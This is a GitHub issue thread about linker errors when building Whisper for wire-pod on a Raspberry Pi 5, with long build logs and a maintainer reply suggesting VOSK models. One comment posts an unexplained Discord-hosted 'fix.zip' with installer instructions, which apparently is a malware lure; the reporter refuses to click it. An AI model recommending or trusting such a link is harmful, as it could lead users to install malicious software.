kercre123/wire-pod #384: [BUG] Whisper for Raspberry Pi

AshMartian, 2024-09-03:
Getting a gcc error when trying to setup Whisper on a Raspberry Pi 5

```
ash@escapepod:~/wire-pod $ sudo ./chipper/start.sh
# command-line-arguments
/usr/local/go/pkg/tool/linux_arm64/link: running gcc failed: exit status 1
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_compute_forward_conv_transpose_1d: error: undefined reference to 'GOMP_barrier'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_compute_forward_conv_transpose_1d: error: undefined reference to 'GOMP_barrier'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_compute_forward_conv_transpose_2d: error: undefined reference to 'GOMP_barrier'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_compute_forward_out_prod: error: undefined reference to 'GOMP_barrier'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_graph_compute._omp_fn.0: error: undefined reference to 'GOMP_single_start'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_graph_compute._omp_fn.0: error: undefined reference to 'omp_get_num_threads'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_graph_compute._omp_fn.0: error: undefined reference to 'omp_get_thread_num'
/home/ash/wire-pod/chipper/../whisper.cpp/libwhisper.a(ggml.o):ggml.c:function ggml_graph_compute: error: undefined reference to 'GOMP_parallel'
collect2: error: ld returned 1 exit status
```

**What are you running wire-pod on?**
  - [OS]: Raspbian
  - [Hardware]: Raspberry Pi 5 8Gb

**What steps have you tried?**

Few different truobleshooting steps from various github issues. 
Attempting to reproduce the results from https://github.com/ggerganov/whisper.cpp/discussions/166
deleted `./whisper.cpp` and followed installation instructions there, but then encountered a different error
```
ash@escapepod:~/wire-pod $ sudo ./chipper/start.sh
# command-line-arguments
/usr/local/go/pkg/tool/linux_arm64/link: running gcc failed: exit status 1
/usr/bin/ld.gold: error: cannot find -lwhisper
/tmp/go-link-4085745696/000006.o:_cgo_export.c:function whisper_full_default_params_cb: error: undefined reference to 'whisper_full_default_params'
/tmp/go-link-4085745696/000007.o:params.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_lang_id: error: undefined reference to 'whisper_lang_id'
/tmp/go-link-4085745696/000007.o:params.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_lang_str: error: undefined reference to 'whisper_lang_str'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function whisper_full_default_params_cb: error: undefined reference to 'whisper_full_default_params'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_context_default_params: error: undefined reference to 'whisper_context_default_params'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_decode: error: undefined reference to 'whisper_decode'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_encode: error: undefined reference to 'whisper_encode'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_free: error: undefined reference to 'whisper_free'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full: error: undefined reference to 'whisper_full'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_segment_t0: error: undefined reference to 'whisper_full_get_segment_t0'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_segment_t1: error: undefined reference to 'whisper_full_get_segment_t1'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_segment_text: error: undefined reference to 'whisper_full_get_segment_text'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_token_data: error: undefined reference to 'whisper_full_get_token_data'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_token_id: error: undefined reference to 'whisper_full_get_token_id'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_token_p: error: undefined reference to 'whisper_full_get_token_p'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_get_token_text: error: undefined reference to 'whisper_full_get_token_text'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_lang_id: error: undefined reference to 'whisper_full_lang_id'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_n_segments: error: undefined reference to 'whisper_full_n_segments'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_n_tokens: error: undefined reference to 'whisper_full_n_tokens'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_full_parallel: error: undefined reference to 'whisper_full_parallel'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_init_from_file_with_params: error: undefined reference to 'whisper_init_from_file_with_params'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_is_multilingual: error: undefined reference to 'whisper_is_multilingual'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_lang_auto_detect: error: undefined reference to 'whisper_lang_auto_detect'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_lang_max_id: error: undefined reference to 'whisper_lang_max_id'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_n_audio_ctx: error: undefined reference to 'whisper_n_audio_ctx'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_n_len: error: undefined reference to 'whisper_n_len'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_n_text_ctx: error: undefined reference to 'whisper_n_text_ctx'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_n_vocab: error: undefined reference to 'whisper_n_vocab'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_pcm_to_mel: error: undefined reference to 'whisper_pcm_to_mel'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_print_system_info: error: undefined reference to 'whisper_print_system_info'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_print_timings: error: undefined reference to 'whisper_print_timings'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_reset_timings: error: undefined reference to 'whisper_reset_timings'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_set_mel: error: undefined reference to 'whisper_set_mel'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_beg: error: undefined reference to 'whisper_token_beg'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_eot: error: undefined reference to 'whisper_token_eot'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_lang: error: undefined reference to 'whisper_token_lang'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_not: error: undefined reference to 'whisper_token_not'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_prev: error: undefined reference to 'whisper_token_prev'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_solm: error: undefined reference to 'whisper_token_solm'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_sot: error: undefined reference to 'whisper_token_sot'
[... cut ...]
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_transcribe: error: undefined reference to 'whisper_token_transcribe'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_token_translate: error: undefined reference to 'whisper_token_translate'
/tmp/go-link-4085745696/000008.o:whisper.cgo2.c:function _cgo_258a936130c3_Cfunc_whisper_tokenize: error: undefined reference to 'whisper_tokenize'
collect2: error: ld returned 1 exit status
``` 

Will continue tinkering, but wanted to document the issue

maher-nakesh, 2024-09-03:
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

AshMartian, 2024-09-03:
Sus, not clicking that

kercre123, 2024-09-03:
I have only ever tested it on x86_64 hardware, it might have something to do with that. I don't think a Pi would be powerful enough for this, even with the `tiny` model. A Pi 5 might be powerful enough for a larger [VOSK model](https://alphacephei.com/vosk/models), though

AshMartian, 2024-09-05:
Ah okay thank you @kercre123, the problem is VOSK has a very hard time understanding my son 😅